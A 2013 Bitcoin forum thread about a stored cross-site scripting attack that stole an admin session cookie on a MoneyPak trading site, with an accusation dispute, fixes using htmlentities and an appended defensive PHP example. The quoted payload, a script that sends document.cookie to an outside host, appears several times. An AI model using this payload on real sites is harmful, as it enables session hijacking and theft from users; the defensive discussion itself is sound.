MoneypakTrader.com (OP)
Sr. Member
Offline
Activity: 472
Merit: 250
Never spend your money before you have it.
June 02, 2013, 05:36:28 PM Last edit: June 29, 2013, 09:40:58 PM by MoneypakTrader.com
UPDATE 6/3 SOLVED, no more entries will be reviewed.

As it goes, I need to block code from being executed and instead print the contents of the mysql block. Fix this code:

while ($xyz = $mnop->fetch()) { echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />'; }

Pay is $100 in BTC for complete functional substitution blocking code execution from the msg fetched and instead display it as plaintext, no code allowed. SOLVED

END OF REQUEST, BEGIN INFO: Post *YOUR* code if I'm really using it dumbass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional. You ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.

Scammer/Hacker wannabe TF hijacked an admin session via an SQL injection directing the admin cookie to his site (code at bottom of post).

His Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105 User "foobar" : foo@bar.com

There were a few minutes that Scammer/Hacker TF had access to the admin panel. Fortunately, none of the info there is too bad and this piece of shit might not invade the privacy of the users.

UPDATE: It appears only limited, session information was stolen. Code used:

<script>document.write("<img src=' http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>
mprep
Global Moderator
Legendary
Offline
Activity: 3794
Merit: 2612
In a world of peaches, don't ask for apple sauce
June 02, 2013, 05:56:08 PM
Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.
MoneypakTrader.com (OP)
Sr. Member
Offline
Activity: 472
Merit: 250
Never spend your money before you have it.
June 02, 2013, 06:01:54 PM
Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

Who do I give root access to my site to back the accusations? Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).
mprep
Global Moderator
Legendary
Offline
Activity: 3794
Merit: 2612
In a world of peaches, don't ask for apple sauce
June 02, 2013, 06:07:45 PM
Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

Who do I give root access to my site to back the accusations? Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).

You clearly are in rage (and in a lot of psychological pain I suppose). Relax because you're trying to tear down a building with a stick.
The 4ner
aka newbitcoinqtuser
Hero Member
Offline
Activity: 602
Merit: 500
R.I.P Silk Road 1.0
June 02, 2013, 06:11:20 PM
Man this is a heavy accusation. Second accusation I've seen against TF since last month.
mprep
Global Moderator
Legendary
Offline
Activity: 3794
Merit: 2612
In a world of peaches, don't ask for apple sauce
June 02, 2013, 06:13:29 PM
Man this is a heavy accusation. Second accusation I've seen against TF since last month.
Yeah, I noticed too. It's kind of beginning to annoy me. He seems to have some kind of serious hatred for TradeFortress.
MoneypakTrader.com (OP)
Sr. Member
Offline
Activity: 472
Merit: 250
Never spend your money before you have it.
June 02, 2013, 06:15:27 PM
Who made the other accusation? Links will help counter troll mprep
ironcross360
Full Member
Offline
Activity: 140
Merit: 100
Troll of the Fourth Reich.
June 02, 2013, 06:16:41 PM
As it goes, I need to block code from being executed and instead print the contents of the mysql block. Fix this code:

while ($xyz = $mnop->fetch()) { echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />'; }

Pay is $100 in BTC for complete functional substitution blocking code execution from the msg fetched and instead display it as plaintext, no code allowed.

END OF REQUEST, BEGIN INFO: Post *YOUR* code if I'm really using it dumbass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional. You ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.

Which programmer did you pay? [Either I didn't code that part of your site or my code really is shit], security vulnerability: [I can't see the code, but did get read/write access to the db, but don't know how the new storage system is named so can't do the bitcoin redirection I attempted]

Scammer/Hacker wannabe attempted to divert deposits from the site, using an apparently custom address for the attempted theft: Fortunately, he knew so little of the code, he only managed to rewrite his personal deposit address to: 1KentoeyU1VuoD4oCBsnTm3yTXksGRiWww

Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105 User "foobar" : foo@bar.com Password hash was destroyed unfortunately in a hurried attempt to block the hacker. People may presume the possibility that Scammer/Hacker accessed all the account info generally visible about user account. Fortunately, none of the info required is too bad and this piece of shit might not invade the privacy of these users (lawsuits are valid against him if he does so).

UPDATE: It appears only limited, session information was stolen, could use help minimizing this damage in the future. Code used:

<script>document.write("<img src=' http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>

Maybe you shouldn't have hacked him first.
Why are you just staring at this? Just send it! 1MHZjADM41ttjbPUiTPYWGYGm45XLf8ZeS
mprep
Global Moderator
Legendary
Offline
Activity: 3794
Merit: 2612
In a world of peaches, don't ask for apple sauce
June 02, 2013, 06:19:37 PM
Who made the other accusation? Links will help counter troll mprep
Dude, what's your problem? You seem to be full of hatred to everyone. And that's just my opinion that I'm not forcing on to you. I tell what I think and I don't give a damn if you like or care about it or not. You should sit down, relax and stop attacking everyone who's not with you. If I wanted to fight against you, I would've made a separate thread.
MoneypakTrader.com (OP)
Sr. Member
Offline
Activity: 472
Merit: 250
Never spend your money before you have it.
June 02, 2013, 06:23:03 PM
I handle 10's of thousands of dollars for my clients as the hacked info will reveal. The link of the hack picture was posted by tradefortress.
mprep
Global Moderator
Legendary
Offline
Activity: 3794
Merit: 2612
In a world of peaches, don't ask for apple sauce
June 02, 2013, 06:28:36 PM
I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.
Understood. I wish you good luck in your further pursuits if they are honorable and fair. I don't even want to get between the conflict (or dispute, whatever you call it) with you and TradeFortress.
MoneypakTrader.com (OP)
Sr. Member
Offline
Activity: 472
Merit: 250
Never spend your money before you have it.
June 02, 2013, 07:35:37 PM
Here are his messages in the site that led to the PHPSESSID HACK:

Jun 1, 09:17:41 foobar Message: So what do I do now? Do I get moneypak codes ? Do I get bitcoin? do I get balance to my debit card? what is your service
Jun 1, 09:16:29 foobar Message: <script>document.write("<img src=' http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>
Jun 1, 09:02:38 foobar Message: <b>foo</b>
Jun 1, 09:02:29 foobar Message: how does this work
MagicBit15
Sr. Member
Offline
Activity: 294
Merit: 250
Let's Start a Cryptolution!!
June 02, 2013, 08:59:25 PM
Why are you getting hacked so much?
Social engineering or are you just coding that poorly and not debugging properly before you launch?
wachtwoord
Legendary
Offline
Activity: 2338
Merit: 1136
June 02, 2013, 09:25:45 PM
I PM'ed this but MPT asked to post it here instead:

Hey,

You asked to fix the following code:

while ($xyz = $mnop->fetch()) { echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />'; }

I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):

if (get_magic_quotes_gpc()) { $name = stripslashes($name); }
$name = mysql_real_escape_string($name);
mysql_query("SELECT * FROM users WHERE name='{$name}'");

Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff']). Do you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block. If I misunderstood and you mean something else altogether, please clarify.

Regards
MoneypakTrader.com (OP)
Sr. Member
Offline
Activity: 472
Merit: 250
Never spend your money before you have it.
June 02, 2013, 09:29:38 PM
Why are you getting hacked so much? Social engineering or are you just coding that poorly and not debugging properly before you launch?
The site was hacked once due to shitty programmers. I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid. This might also be a reason scammer TradeFortress tried to hack and steal the site's coins: I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.
It's more like hundreds of BTC, but same difference.
MoneypakTrader.com (OP)
Sr. Member
Offline
Activity: 472
Merit: 250
Never spend your money before you have it.
June 02, 2013, 09:40:29 PM
I PM'ed this but MPT asked to post it here instead:

Hey,

You asked to fix the following code:

while ($xyz = $mnop->fetch()) { echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />'; }

I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):

if (get_magic_quotes_gpc()) { $name = stripslashes($name); }
$name = mysql_real_escape_string($name);
mysql_query("SELECT * FROM users WHERE name='{$name}'");

Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff']). Do you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block. If I misunderstood and you mean something else altogether, please clarify.

Regards

Looks like stripslashes doesn't block opening a line of code, does it?
MagicBit15
Sr. Member
Offline
Activity: 294
Merit: 250
Let's Start a Cryptolution!!
June 02, 2013, 10:01:51 PM
Why are you getting hacked so much? Social engineering or are you just coding that poorly and not debugging properly before you launch?
The site was hacked once due to shitty programmers. I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid. This might also be a reason scammer TradeFortress tried to hack and steal the site's coins: I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.
It's more like hundreds of BTC, but same difference.

Ah I see that sucks. No way you can contact him? Or is he not responding at all, email or skype or anything?
🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
Offline
Activity: 1316
Merit: 1043
👻
June 02, 2013, 10:04:11 PM
LOL? Prove that I have "changed my deposit address", that was the auto generated one. You can't even change it, bitcoind or Blockchain.info doesn't let you. It looks like a vanity address though.

Anyway, show me the damages I've done to you. Which is nothing other than your site's reputation, which I think is fair - an eye for an eye. I regularly try to break into sites, and I always disclose it to the owners without any malicious damages done. For some people, I do it publicly.

Here: htmlentities( [db output] ). It's funny how there are so many responses yet no one knows basic web security.
🏰 TradeFortress 🏰
Bitcoin Veteran
VIP
Legendary
Offline
Activity: 1316
Merit: 1043
👻
June 02, 2013, 10:24:03 PM
Thanks for advertising my pentesting skills too!
danieldaniel
June 02, 2013, 10:29:35 PM
All you have to do is htmlentities(<data that you want to clean>); Do that with any user-supplied input before you print it to the screen.

Edit: You can see the PHP page here: http://php.net/manual/en/function.htmlentities.php

Edit Edit: Fully functioning code:

-Start-
while ($xyz = $mnop->fetch()) { echo '<br /><strong>Message:</strong> '.htmlentities($xyz['stuff']).'<br />'; }
-End-
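The two fixes argued over in this thread, escaping on the way into the database (wachtwoord's post) and encoding on the way out to the page (the htmlentities answers), are different controls against different bugs. The following is an added example, not the site's code and not any poster's, that puts both in one runnable script: a prepared statement on the input side, output encoding in the display loop, and the HttpOnly flag on the session cookie as the extra layer the OP asked about for "minimizing this damage in the future". It assumes an in-memory SQLite database in place of the site's MySQL table, a column named "stuff" and the loop variables $mnop and $xyz from the thread's snippet; the sample messages are constructed, modelled on the ones quoted above, with the exfiltration host replaced by a placeholder.

```php
<?php
// Added example (not the site's code or any poster's): store a visitor's chat
// message with a prepared statement, then render it with output encoding so
// stored markup is displayed as text instead of being run by the next
// visitor's browser (the stored XSS / PHPSESSID theft this thread is about).
// Assumptions: an in-memory SQLite database stands in for the site's MySQL
// table, the column is called "stuff" and the loop variables are $mnop/$xyz
// as in the thread's snippet; the sample messages are constructed.
declare(strict_types=1);

// Defence in depth for the session cookie (assumption: PHP >= 7.3 array form).
// With HttpOnly set, document.cookie in the browser cannot read PHPSESSID,
// so a missed encoding spot no longer hands the session id to an injected
// script. Must run before session_start(); the real page calls session_start()
// afterwards, this script only sets the parameters.
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);

// Constructed sample input modelled on the messages quoted in the thread.
$untrustedMessages = [
    'how does this work',
    '<b>foo</b>',
    '<script>document.write("<img src=\'http://attacker.invalid/?" + document.cookie + "\' />");</script>',
];

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, stuff TEXT NOT NULL)');

// Input side: the prepared statement keeps user text out of the SQL grammar.
// This is what stops SQL injection; it does nothing for script injection,
// which is decided at output time.
$insert = $pdo->prepare('INSERT INTO messages (stuff) VALUES (:stuff)');
foreach ($untrustedMessages as $message) {
    $insert->execute([':stuff' => $message]);
}

// Output side: encode at the moment the value is written into HTML. This is
// the step the thread's vulnerable loop skipped. ENT_QUOTES also encodes
// quotes so the value stays safe inside attribute values; ENT_SUBSTITUTE
// keeps invalid UTF-8 from silently turning the whole message into "".
function renderMessage(string $raw): string
{
    $safe = htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<br /><strong>Message:</strong> ' . $safe . '<br />';
}

// Check used below: the rendered line must not contain a raw "<script" or
// "<img" start tag; only the encoded "&lt;script" form may appear.
function isInert(string $html): bool
{
    return stripos($html, '<script') === false && stripos($html, '<img') === false;
}

$mnop = $pdo->query('SELECT stuff FROM messages ORDER BY id');
while ($xyz = $mnop->fetch(PDO::FETCH_ASSOC)) {
    $line = renderMessage($xyz['stuff']);
    if (!isInert($line)) {
        throw new RuntimeException('encoding failed: ' . $line);
    }
    echo $line, "\n";
}
```

Run it with `php` on the command line (the pdo_sqlite extension must be loaded); the third line of output shows the script payload as `&lt;script&gt;...` text, which a browser displays but does not execute. The encoding is applied when rendering rather than when storing, so the database keeps the original text and the same row can later be emitted into a different context (JSON, a plain-text email) with the encoding that context needs. htmlentities() as used in the posts above works the same way for the characters that matter here; it additionally encodes non-ASCII characters, which is harmless but unnecessary when the page is served as UTF-8.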